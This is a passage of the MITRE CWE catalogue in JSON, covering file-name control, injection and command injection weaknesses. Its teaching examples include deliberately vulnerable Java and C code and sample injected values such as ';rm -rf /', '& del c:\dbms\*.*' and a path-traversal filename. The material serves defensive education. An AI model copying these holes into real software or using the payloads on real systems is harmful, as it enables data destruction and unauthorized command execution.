feasible."},{"Phase":"Testing","Description":"Use dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results."},{"Phase":"Testing","Description":"Use tools and techniques that require manual (human) analysis, such as penetration testing, threat modeling, and interactive tools that allow the tester to record and modify an active session. These may be more effective than strictly automated techniques. This is especially the case with weaknesses that are related to design and business rules."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-65"},"Intro_Text":"The following code uses input from an HTTP request to create a file name. The programmer has not considered the possibility that an attacker could provide a file name such as \\"../../tomcat/conf/server.xml\\", which causes the application to delete one of its own configuration files (CWE-22).","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"String rName = request.getParameter(\\"reportName\\");File rFile = new File(\\"/usr/local/apfr/reports/\\" + rName);...rFile.delete();","xhtml:br":["","",""]}}},{"attr":{"@_Demonstrative_Example_ID":"DX-66"},"Intro_Text":"The following code uses input from a configuration file to determine which file to open and echo back to the user. If the program runs with privileges and malicious users can change the configuration file, they can use the program to read any file on the system that ends with the extension .txt.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"fis = new FileInputStream(cfg.getProperty(\\"sub\\")+\\".txt\\");amt = fis.read(arr);out.println(arr);","xhtml:br":["",""]}}}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2008-5748","Description":"Chain: external control of values for user\'s desired language and theme enables path traversal.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5748"},{"Reference":"CVE-2008-5764","Description":"Chain: external control of user\'s target language enables remote file inclusion.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5764"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"Path Manipulation"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP16","Entry_Name":"Path Traversal"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"80"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-6"}},{"attr":{"@_External_Reference_ID":"REF-45"}}]},"Notes":{"Note":[{"#text":"CWE-114 is a Class, but it is listed a child of CWE-73 in view 1000. This suggests some abstraction problems that should be resolved in future versions.","attr":{"@_Type":"Maintenance"}},{"attr":{"@_Type":"Relationship"},"xhtml:p":["The external control of filenames can be the primary link in chains with other file-related weaknesses, as seen in the CanPrecede relationships. This is because software systems use files for many different purposes: to execute programs, load code libraries, to store application data, to store configuration settings, record temporary data, act as signals or semaphores to other processes, etc.","However, those weaknesses do not always require external control. For example, link-following weaknesses (CWE-59) often involve pathnames that are not controllable by the attacker at all.","The external control can be resultant from other issues. For example, in PHP applications, the register_globals setting can allow an attacker to modify variables that the programmer thought were immutable, enabling file inclusion (CWE-98) and path traversal (CWE-22). Operating with excessive privileges (CWE-250) might allow an attacker to specify an input filename that is not directly readable by the attacker, but is accessible to the privileged program. A buffer overflow (CWE-119) might give an attacker control over nearby memory locations that are related to pathnames, but were not directly modifiable by the attacker."]}]},"Content_History":{"Submission":{"Submission_Name":"7 Pernicious Kingdoms","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Common_Consequences, Demonstrative_Examples, Description, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationship_Notes, Relationships, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Demonstrative_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Common_Consequences, Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-12-28","Modification_Comment":"updated Detection_Factors"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Demonstrative_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Likelihood_of_Exploit, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, References, Relationships, Time_of_Introduction, Type"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2021-03-15","Modification_Comment":"updated Maintenance_Notes, Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Path Manipulation","attr":{"@_Date":"2008-04-11"}}}},"74":{"attr":{"@_ID":"74","@_Name":"Improper Neutralization of Special Elements in Output Used by a Downstream Component (\'Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Incomplete"},"Description":"The software constructs all or part of a command, data structure, or record using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify how it is parsed or interpreted when it is sent to a downstream component.","Extended_Description":"Software has certain assumptions about what constitutes data and control respectively. It is the lack of verification of these assumptions for user-controlled input that leads to injection problems. Injection problems encompass a wide variety of issues -- all mitigated in very different ways and usually attempted in order to alter the control flow of the process. For this reason, the most effective way to discuss these weaknesses is to note the distinct features which classify them as injection weaknesses. The most important issue to note is that all injection problems share one thing in common -- i.e., they allow for the injection of control plane data into the user-controlled data plane. This means that the execution of the process may be altered by sending code in through legitimate data channels, using no other mechanism. While buffer overflows, and many other flaws, involve the use of some further issue to gain execution, injection problems need only for the data to be parsed. The most classic instantiations of this category of weakness are SQL injection and format string vulnerabilities.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"707","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Many injection attacks involve the disclosure of important information -- in terms of both data sensitivity and usefulness in further exploitation."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"In some cases, injectable code controls authentication; this may lead to a remote vulnerability."},{"Scope":"Other","Impact":"Alter Execution Logic","Note":"Injection attacks are characterized by the ability to significantly change the flow of a given process, and in some cases, to the execution of arbitrary code."},{"Scope":["Integrity","Other"],"Impact":"Other","Note":"Data injection attacks lead to loss of data integrity in nearly all cases as the control-plane data injected is always incidental to data recall or writing."},{"Scope":"Non-Repudiation","Impact":"Hide Activities","Note":"Often the actions performed by injected control code are unlogged."}]},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter control-plane syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"Injection problem (\'data\' used as something else)"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"10"}},{"attr":{"@_CAPEC_ID":"101"}},{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"120"}},{"attr":{"@_CAPEC_ID":"13"}},{"attr":{"@_CAPEC_ID":"135"}},{"attr":{"@_CAPEC_ID":"14"}},{"attr":{"@_CAPEC_ID":"24"}},{"attr":{"@_CAPEC_ID":"250"}},{"attr":{"@_CAPEC_ID":"267"}},{"attr":{"@_CAPEC_ID":"273"}},{"attr":{"@_CAPEC_ID":"28"}},{"attr":{"@_CAPEC_ID":"3"}},{"attr":{"@_CAPEC_ID":"34"}},{"attr":{"@_CAPEC_ID":"42"}},{"attr":{"@_CAPEC_ID":"43"}},{"attr":{"@_CAPEC_ID":"45"}},{"attr":{"@_CAPEC_ID":"46"}},{"attr":{"@_CAPEC_ID":"47"}},{"attr":{"@_CAPEC_ID":"51"}},{"attr":{"@_CAPEC_ID":"52"}},{"attr":{"@_CAPEC_ID":"53"}},{"attr":{"@_CAPEC_ID":"6"}},{"attr":{"@_CAPEC_ID":"64"}},{"attr":{"@_CAPEC_ID":"67"}},{"attr":{"@_CAPEC_ID":"7"}},{"attr":{"@_CAPEC_ID":"71"}},{"attr":{"@_CAPEC_ID":"72"}},{"attr":{"@_CAPEC_ID":"76"}},{"attr":{"@_CAPEC_ID":"78"}},{"attr":{"@_CAPEC_ID":"79"}},{"attr":{"@_CAPEC_ID":"8"}},{"attr":{"@_CAPEC_ID":"80"}},{"attr":{"@_CAPEC_ID":"83"}},{"attr":{"@_CAPEC_ID":"84"}},{"attr":{"@_CAPEC_ID":"9"}}]},"References":{"Reference":{"attr":{"@_External_Reference_ID":"REF-18"}}},"Notes":{"Note":{"#text":"Many people treat injection only as an input validation problem (CWE-20) because many people do not distinguish between the consequence/attack (injection) and the protection mechanism that prevents the attack from succeeding. However, input validation is only one potential protection mechanism (output encoding is another), and there is a chaining relationship between improper input validation and the improper enforcement of the structure of messages to other components. Other issues not directly related to input validation, such as race conditions, could similarly impact message structure.","attr":{"@_Type":"Theoretical"}}},"Content_History":{"Submission":{"Submission_Name":"CLASP","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Common_Consequences, Description, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Name, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Common_Consequences, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-02-18","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-01-19","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated References, Relationship_Notes, Relationships, Theoretical_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"}],"Previous_Entry_Name":[{"#text":"Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Sanitize Data into a Different Plane (aka \'Injection\')","attr":{"@_Date":"2009-05-27"}},{"#text":"Failure to Sanitize Data into a Different Plane (\'Injection\')","attr":{"@_Date":"2010-06-21"}}]}},"75":{"attr":{"@_ID":"75","@_Name":"Failure to Sanitize Special Elements into a Different Plane (Special Element Injection)","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software does not adequately filter user-controlled input for special elements with control implications.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":["Modify Application Data","Execute Unauthorized Code or Commands"]}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Special Element Injection"}},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"81"}},{"attr":{"@_CAPEC_ID":"93"}}]},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations, Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":{"#text":"Special Element Injection","attr":{"@_Date":"2008-04-11"}}}},"76":{"attr":{"@_ID":"76","@_Name":"Improper Neutralization of Equivalent Special Elements","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software properly neutralizes certain special elements, but it improperly neutralizes equivalent special elements.","Extended_Description":"The software may have a fixed list of special characters it believes is complete. However, there may be alternate encodings, or representations that also have the same meaning. For example, the software may filter out a leading slash (/) to prevent absolute path names, but does not account for a tilde (~) followed by a user name, which on some *nix systems could be expanded to an absolute pathname. Alternately, the software might filter a dangerous \\"-e\\" command-line switch when calling an external program, but it might not account for \\"--exec\\" or other switches that have the same semantics.","Related_Weaknesses":{"Related_Weakness":{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"75","@_View_ID":"1000","@_Ordinal":"Primary"}}},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":"Other","Impact":"Other"}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Requirements","Description":"Programming languages and supporting technologies might be chosen which are not subject to these issues."},{"Phase":"Implementation","Description":"Utilize an appropriate mix of allowlist and denylist parsing to filter equivalent special element syntax from all input."}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"Equivalent Special Element Injection"}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Description, Other_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Description, Name"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-12-13","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-05-03","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Likelihood_of_Exploit, Modes_of_Introduction, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"}],"Previous_Entry_Name":[{"#text":"Equivalent Special Element Injection","attr":{"@_Date":"2008-04-11"}},{"#text":"Failure to Resolve Equivalent Special Elements into a Different Plane","attr":{"@_Date":"2010-06-21"}}]}},"77":{"attr":{"@_ID":"77","@_Name":"Improper Neutralization of Special Elements used in a Command (\'Command Injection\')","@_Abstraction":"Class","@_Structure":"Simple","@_Status":"Draft"},"Description":"The software constructs all or part of a command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Command injection vulnerabilities typically occur when:","Many protocols and products have their own custom command language. While OS or shell command strings are frequently discovered and targeted, developers may not realize that these other command languages might also be vulnerable to attacks.","Command injection is a common problem with wrapper programs."],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["1. Data enters the application from an untrusted source.","2. The data is part of a string that is executed as a command by the application.","3. By executing the command, the application gives an attacker a privilege or capability that the attacker would not otherwise have."]}},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Weakness_Ordinalities":{"Weakness_Ordinality":{"Ordinality":"Primary"}},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design"},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":{"Scope":["Integrity","Confidentiality","Availability"],"Impact":"Execute Unauthorized Code or Commands","Note":"If a malicious user injects a character (such as a semi-colon) that delimits the end of one command and the beginning of another, it may be possible to then insert an entirely new and unrelated command that was not intended to be executed."}},"Potential_Mitigations":{"Mitigation":[{"Phase":"Architecture and Design","Description":"If at all possible, use library calls rather than external processes to recreate the desired functionality."},{"Phase":"Implementation","Description":"If possible, ensure that all external commands called from the program are statically created."},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright."]}},{"Phase":"Operation","Description":"Run time: Run time policy enforcement may be used in an allowlist fashion to prevent use of any non-sanctioned commands."},{"Phase":"System Configuration","Description":"Assign permissions to the software system that prevents the user from accessing/opening privileged files."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"attr":{"@_Demonstrative_Example_ID":"DX-30"},"Intro_Text":"The following simple program accepts a filename as a command line argument and displays the contents of the file back to the user. The program is installed setuid root because it is intended for use as a learning tool to allow system administrators in-training to inspect privileged system files without giving them the ability to modify them or damage the system.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"int main(int argc, char** argv) {}","xhtml:div":{"#text":"char cmd[CMD_MAX] = \\"/usr/bin/cat \\";strcat(cmd, argv[1]);system(cmd);","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":["Because the program runs with root privileges, the call to system() also executes with root privileges. If a user specifies a standard filename, the call works as expected. However, if an attacker passes a string of the form \\";rm -rf /\\", then the call to system() fails to execute cat due to a lack of arguments and then plows on to recursively delete the contents of the root partition.","Note that if argv[1] is a very long argument, then this issue might also be subject to a buffer overflow (CWE-120)."]},{"attr":{"@_Demonstrative_Example_ID":"DX-28"},"Intro_Text":"The following code is from an administrative web application designed to allow users to kick off a backup of an Oracle database using a batch-file wrapper around the rman utility and then run a cleanup.bat script to delete some temporary files. The script rmanDB.bat accepts a single command line parameter, which specifies what type of backup to perform. Because access to the database is restricted, the application runs the backup as a privileged user.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String btype = request.getParameter(\\"backuptype\\");String cmd = new String(\\"cmd.exe /K \\\\\\"System.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""],"xhtml:div":{"#text":"c:\\\\\\\\util\\\\\\\\rmanDB.bat \\"+btype+\\"&amp;&amp;c:\\\\\\\\utl\\\\\\\\cleanup.bat\\\\\\"\\")","attr":{"@_style":"margin-left:10px;"},"xhtml:br":["",""]}}},"Body_Text":"The problem here is that the program does not do any validation on the backuptype parameter read from the user. Typically the Runtime.exec() function will not execute multiple commands, but in this case the program first runs the cmd.exe shell in order to run multiple commands with a single call to Runtime.exec(). Once the shell is invoked, it will happily execute multiple commands separated by two ampersands. If an attacker passes a string of the form \\"&amp; del c:\\\\\\\\dbms\\\\\\\\*.*\\", then the application will execute this command along with the others specified by the program. Because of the nature of the application, it runs with the privileges necessary to interact with the database, which means whatever command the attacker injects will run with those privileges as well."},{"Intro_Text":"The following code from a system utility uses the system property APPHOME to determine the directory in which it is installed and then executes an initialization script based on a relative path from the specified directory.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Java"},"xhtml:div":{"#text":"...String home = System.getProperty(\\"APPHOME\\");String cmd = home + INITCMD;java.lang.Runtime.getRuntime().exec(cmd);...","xhtml:br":["","","",""]}},"Body_Text":"The code above allows an attacker to execute arbitrary commands with the elevated privilege of the application by modifying the system property APPHOME to point to a different path containing a malicious version of INITCMD. Because the program does not validate the value read from the environment, if an attacker can control the value of the system property APPHOME, then they can fool the application into running malicious code and take control of the system."},{"Intro_Text":"The following code is a wrapper around the UNIX command cat which prints the contents of a file to standard out. It is also injectable:","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C"},"xhtml:div":{"#text":"#include &lt;stdio.h&gt;#include &lt;unistd.h&gt;int main(int argc, char **argv) {}","xhtml:br":["","",""],"xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":{"#text":"char cat[] = \\"cat \\";char *command;size_t commandLength;commandLength = strlen(cat) + strlen(argv[1]) + 1;command = (char *) malloc(commandLength);strncpy(command, cat, commandLength);strncat(command, argv[1], (commandLength - strlen(cat)) );system(command);return (0);","xhtml:br":["","","","","","","","","","",""]}}}},{"attr":{"@_Nature":"informative"},"xhtml:div":{"#text":"$ ./catWrapper Story.txtWhen last we left our heroes...","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"$ ./catWrapper Story.txt; lsWhen last we left our heroes...Story.txtSensitiveFile.txtPrivateData.dba.out*","xhtml:br":["","","","",""]}}],"Body_Text":["Used normally, 